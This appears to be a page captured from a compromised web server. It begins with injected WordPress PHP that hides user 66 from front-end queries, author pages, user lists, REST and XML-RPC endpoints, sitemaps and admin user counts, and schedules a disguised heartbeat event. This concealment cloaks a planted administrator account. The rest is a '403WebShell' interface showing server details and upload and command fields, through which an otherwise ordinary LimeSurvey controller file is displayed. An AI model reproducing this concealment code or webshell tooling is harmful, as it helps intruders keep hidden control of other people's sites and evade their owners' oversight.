add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 167.235.224.122  /  Your IP : 216.73.216.110
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64
User : deploy ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/html/limesurvey/application/controllers/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/limesurvey/application/controllers/SurveysController.php
<?php

/**
 * This class will handle survey creation and manipulation.
 */
class SurveysController extends LSYii_Controller
{
    /* All this part is for PUBLIC view : maybe move to LSYii_Controller ? */
    /* @var string : Default layout when using render : leave at bare actually : just send content */
    public $layout = 'public';
    /* @var string the template name to be used when using layout */
    public $sTemplate;
    /* @var string[] Replacement data when use templatereplace function in layout, @see templatereplace $replacements */
    public $aReplacementData = array();
    /* @var array Global data when use templatereplace function  in layout, @see templatereplace $redata */
    public $aGlobalData = array();

    public $defaultAction = 'publicList';

    public function actionPublicList($lang = null)
    {
        if (!empty($lang)) {
            // Validate if languages exists and fall back to default lang if needed
            $aLanguages = getLanguageDataRestricted(false, 'short');
            if (!isset($aLanguages[ $lang ])) {
                $lang = App()->getConfig('defaultlang');
            }
        } else {
            $lang = App()->getConfig('defaultlang');
        }
            App()->setLanguage($lang);


        $oTemplate       = Template::model()->getInstance(getGlobalSetting('defaulttheme'));
        $this->sTemplate = $oTemplate->sTemplateName;

        $aData = array(
            'publicSurveys'     => Survey::model()->active()->open()->with('languagesettings')->findAllPublic(),
            'futureSurveys'     => Survey::model()->active()->registration()->with('languagesettings')->findAllPublic(),
            'oTemplate'         => $oTemplate,
            'sSiteName'         => Yii::app()->getConfig('sitename'),
            'sSiteAdminName'    => Yii::app()->getConfig("siteadminname"),
            'sSiteAdminEmail'   => Yii::app()->getConfig("siteadminemail"),
            'bShowClearAll'     => false,
            'surveyls_title'    => Yii::app()->getConfig('sitename')
        );

        $aData['alanguageChanger']['show'] = false;
        $alanguageChangerDatas = getLanguageChangerDatasPublicList(App()->language);

        if ($alanguageChangerDatas) {
            $aData['alanguageChanger']['show']  = true;
            $aData['alanguageChanger']['datas'] = $alanguageChangerDatas;
        }

        Yii::app()->clientScript->registerScriptFile(Yii::app()->getConfig("generalscripts") . 'nojs.js', CClientScript::POS_HEAD);

        // maintenance mode
        $sMaintenanceMode = getGlobalSetting('maintenancemode');
        if ($sMaintenanceMode == 'hard' || $sMaintenanceMode == 'soft') {
            Yii::app()->twigRenderer->renderTemplateFromFile("layout_maintenance.twig", array('aSurveyInfo' => $aData), false);
        } else {
            Yii::app()->twigRenderer->renderTemplateFromFile("layout_survey_list.twig", array('aSurveyInfo' => $aData), false);
        }
    }

    /**
     * System error : only 404 error are managed here (2016-11-29)
     * SurveysController is the default controller set in internal
     * @see http://www.yiiframework.com/doc/guide/1.1/en/topics.error#handling-errors-using-an-action
     *
     * @throws CException
     * @throws CHttpException
     * @throws Throwable
     * @throws Twig_Error_Loader
     * @throws Twig_Error_Syntax
     * @throws WrongTemplateVersionException
     */
    public function actionError()
    {
        /** @var array */
        $error = Yii::app()->errorHandler->error;
        $oException = Yii::app()->errorHandler->getException();
        $request = Yii::app()->getRequest();
        if ($error && $request->isAjaxRequest) {
            // TODO: Remove? It seems this can never happen because it's already caught by LSYii_Application::onException() (see commit c792c2e).
            $this->spitOutJsonError($error, $oException);
        } elseif ($error) {
            $this->spitOutHtmlError($error);
        } else {
            throw new CHttpException(404, 'Page not found.');
        }
    }

    /**
     * Echo $error as HTML and end execution.
     *
     * @param array $error
     *
     * @return void
     *
     * @throws CException
     * @throws Throwable
     * @throws Twig_Error_Loader
     * @throws Twig_Error_Syntax
     * @throws WrongTemplateVersionException
     */
    public function spitOutHtmlError(array $error)
    {
        $surveyId = LSYii_Application::getSurveyId(false);
        if ($surveyId) {
            $oTemplate = Template::model()->getInstance(null, $surveyId);
        } else {
            $oTemplate = Template::model()->getInstance(App()->getConfig('defaulttheme'));
        }
        $this->sTemplate = $oTemplate->sTemplateName;

        $admin = App()->getConfig('siteadminname');
        if (App()->getConfig('showEmailInError')) {
            // Never show email by default
            $admin = CHtml::mailto(App()->getConfig('siteadminname'), App()->getConfig('siteadminemail'));
        }
        $contact = sprintf(gT('If you think this is a server error, please contact %s.'), $admin);
        switch ($error['code']) {
            case '400':
                /* CRSF issue */
                $title = gT('400: Bad Request');
                $message = gT('The request could not be understood by the server due to malformed syntax.')
                    . ' ' . gT('Please do not repeat the request without modifications.');
                break;
            case '401':
                $title = gT('401: Unauthorized');
                $message = gT('You must be logged in to access to this page.');
                // TODO: Remove comment code.
                // $loginurl = $this->getController()->createUrl("/admin/login")
                // header('WWW-Authenticate: MyAuthScheme  realm="'.$loginurl.'"');
                break;
            case '403':
                $title = gT('403: Forbidden');
                $message = gT('You do not have the permission to access this page.');
                break;
            case '404':
                $title = gT('404: Not Found');
                $message = gT('The requested URL was not found on this server.') . " \n"
                    . gT('If you entered the URL manually please check your spelling and try again.');
                break;
            case '500':
                $title = gT('500: Internal Server Error');
                $message = gT('An internal error occurred while the Web server was processing your request.');
                $contact = sprintf(gT('Please contact %s to report this problem.'), $admin);
                break;
            default:
                $title = sprintf(gT('Error %s'), $error['code']);
                $message = gT('The above error occurred when the Web server was processing your request.');
                break;
        }

        // For CDbException, we clear the message in order to avoid showing sensitive information to the user.
        // This method is not usually executed when debug is enabled, but check anyway to be sure to only
        // suppress the error if debug is disabled.
        if (!YII_DEBUG && isset($error['type']) && $error['type'] == 'CDbException') {
            $error['message'] = gT('Database error!');
        }

        $aError['type'] = $error['code'];
        $aError['error'] = $title;
        if (!empty($error['message'])) {
            $aError['title'] = ' - ' . nl2br(CHtml::encode($error['message']) ?? '');
        }
        $aError['message'] = $message;
        $aError['contact'] = $contact;

        if (App()->getConfig('debug') != 0) {
            $aError['trace'] = $error['trace'];
        }

        $aSurveyInfo['aError'] = $aError;
        App()->twigRenderer->renderTemplateFromFile(
            "layout_errors.twig",
            array('aSurveyInfo' => $aSurveyInfo),
            false
        );
        App()->end();
    }

    /**
     * Echo JSON $error and ends execution.
     *
     * @param array $error
     * @param CException $oException
     *
     * @return void
     *
     * @throws CException
     */
    public function spitOutJsonError(array $error, $oException)
    {
        $dataArray = [
            'data' => [
                'success' => false,
                'message' => $error['message'],
                'error'   => $error,
            ]
        ];

        if ($oException instanceof LSUserException) {
            if ($oException->getRedirectUrl() != null) {
                $dataArray['data']['redirectTo'] = $oException->getRedirectUrl();
            }
            if ($oException->getNoReload() != null) {
                $dataArray['data']['noReload'] = $oException->getNoReload();
            }
        }

        echo App()->getController()->renderPartial(
            '/admin/super/_renderJson',
            $dataArray,
            true,
            false
        );
        App()->end();
    }
}

Youez - 2016 - github.com/yon3zu
LinuXploit